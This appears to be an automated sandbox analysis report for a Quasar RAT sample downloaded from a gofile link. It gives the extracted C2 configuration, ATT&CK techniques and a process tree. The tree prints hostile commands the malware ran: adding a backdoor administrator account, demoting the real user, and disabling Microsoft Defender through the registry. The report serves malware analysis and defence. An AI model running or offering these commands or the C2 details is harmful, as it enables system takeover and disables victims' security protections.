quasar | hxxps://gofile[.]io/d/5m5iIa

Analysis

max time kernel
100s
max time network
102s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/12/2024, 07:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://gofile.io/d/5m5iIa

Score

10^/10

quasar office04 defense_evasion discovery evasion ransomware spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

himato667-58401.portmap.host:58401

Mutex

0e2bc079-3316-407c-a26f-115195d9fe5b

Attributes

encryption_key
D14CC6B8490A41A48C1E115285B6932B9A857EA0
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023d31-204.dat	family_quasar
behavioral1/memory/5556-205-0x0000000000C30000-0x0000000000F54000-memory.dmp	family_quasar

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
760	cmd.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Lose2himato.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Client.exe

Executes dropped EXE 7 IoCs

pid	Process
1768	Lose2himato.exe
5556	better.exe
5652	Client.exe
2636	Client.exe
6112	Client.exe
3044	Client.exe
4012	Client.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
78	discord.com
77	discord.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\SubDir\Client.exe	better.exe
File opened for modification	C:\Windows\system32\SubDir\Client.exe	better.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himato.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himato.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5352	PING.EXE
5996	PING.EXE
5268	PING.EXE
5256	PING.EXE
6032	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "234"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{80BD3539-4699-4EC1-91CA-308C98C1CA92}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 793938.crdownload:SmartScreen	msedge.exe

Runs net.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
6032	PING.EXE
5352	PING.EXE
5996	PING.EXE
5268	PING.EXE
5256	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6124	schtasks.exe
3700	schtasks.exe
6012	schtasks.exe
5600	schtasks.exe
5696	schtasks.exe
4364	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3080	msedge.exe
3080	msedge.exe
3292	msedge.exe
3292	msedge.exe
4204	identity_helper.exe
4204	identity_helper.exe
1668	msedge.exe
1668	msedge.exe
5780	msedge.exe
5780	msedge.exe
1052	msedge.exe
1052	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	5556	better.exe
Token: SeDebugPrivilege	5652	Client.exe
Token: SeDebugPrivilege	2636	Client.exe
Token: SeShutdownPrivilege	5752	shutdown.exe
Token: SeRemoteShutdownPrivilege	5752	shutdown.exe
Token: SeDebugPrivilege	6112	Client.exe
Token: SeDebugPrivilege	3044	Client.exe
Token: SeDebugPrivilege	4012	Client.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
5652	Client.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe

Suspicious use of SendNotifyMessage 37 IoCs

pid	Process
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
5652	Client.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
3292	msedge.exe
2636	Client.exe
6112	Client.exe
3044	Client.exe
4012	Client.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3008	SystemSettingsAdminFlows.exe
5508	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3292 wrote to memory of 532	3292	msedge.exe	85
PID 3292 wrote to memory of 532	3292	msedge.exe	85
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 4168	3292	msedge.exe	86
PID 3292 wrote to memory of 3080	3292	msedge.exe	87
PID 3292 wrote to memory of 3080	3292	msedge.exe	87
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88
PID 3292 wrote to memory of 1384	3292	msedge.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/5m5iIa
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc01e846f8,0x7ffc01e84708,0x7ffc01e84718
  2⤵
  PID:532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
  2⤵
  PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
  2⤵
  PID:1384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
  2⤵
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
  2⤵
  PID:2124
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
  2⤵
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6176 /prefetch:8
  2⤵
  PID:824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6596 /prefetch:8
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6705958952398837002,8968430156382774880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1668
- C:\Users\Admin\Downloads\Lose2himato.exe
  "C:\Users\Admin\Downloads\Lose2himato.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4720
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:4884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5172
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3700
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO Test
      4⤵
      System Location Discovery: System Language Discovery
      PID:5276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3832
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "OWN3DbyHXM4TO" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5292
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    PID:760
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:5284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5308
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2248
  - - C:\Windows\SysWOW64\reg.exe
